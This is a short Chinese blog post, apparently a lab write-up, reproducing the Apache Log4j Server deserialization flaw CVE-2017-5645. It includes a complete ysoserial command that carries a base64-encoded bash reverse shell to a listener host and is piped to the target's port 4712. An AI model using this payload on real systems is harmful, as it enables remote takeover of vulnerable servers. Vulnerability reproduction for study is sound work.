Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

Yeah_0day2024-05-24 11:15

漏洞复现环境搭建请参考

http://t.csdnimg.cn/MxmId

漏洞版本

Apache Log4j 2.8.2之前的2.x版本

漏洞验证

(1)开放端口4712

漏洞利用

(1)ysoserial工具获取

python 复制代码 
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

(2)base64加密反弹shell命令

(3)攻击机开启监听

(4)执行命令获取反弹shell

python 复制代码 
#执行错误原因是因为Kali的jdk版本与ysoserial版本不符,正常执行完该条语句即可反弹shell
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEyOC84ODg4IDA+JjEn}|{base64,-d}|{bash,-i}" | nc 192.168.88.128 4712
相关推荐
嵩山小老虎6 小时前
Windows 10/11 安装 WSL2 并配置 VSCode 开发环境(C 语言 / Linux API 适用)
linux·windows·vscode
Fleshy数模6 小时前
CentOS7 安装配置 MySQL5.7 完整教程(本地虚拟机学习版)
linux·mysql·centos
a41324476 小时前
ubuntu 25 安装vllm
linux·服务器·ubuntu·vllm
一只自律的鸡8 小时前
【Linux驱动】bug处理 ens33找不到IP
linux·运维·bug
17(无规则自律)8 小时前
【CSAPP 读书笔记】第二章:信息的表示和处理
linux·嵌入式硬件·考研·高考
!chen8 小时前
linux服务器静默安装Oracle26ai
linux·运维·服务器
刚刚入门的菜鸟8 小时前
php-curl
运维·web安全·php
24zhgjx-lxq8 小时前
华为ensp:MSTP
网络·安全·华为·hcip·ensp
REDcker9 小时前
Linux 文件描述符与 Socket 选项操作详解
linux·运维·网络
蒹葭玉树9 小时前
【C++上岸】C++常见面试题目--操作系统篇(第二十八期)
linux·c++·面试
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书03OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书042026美赛A题智能手机电池续航时间预测的连续时间数学模型05OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)06Linux下V2Ray安装配置指南07UV安装并设置国内源08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services092025 年大语言模型发展回顾:关键突破、意外转折与 2026 年展望10Claude Code Skills 实用使用手册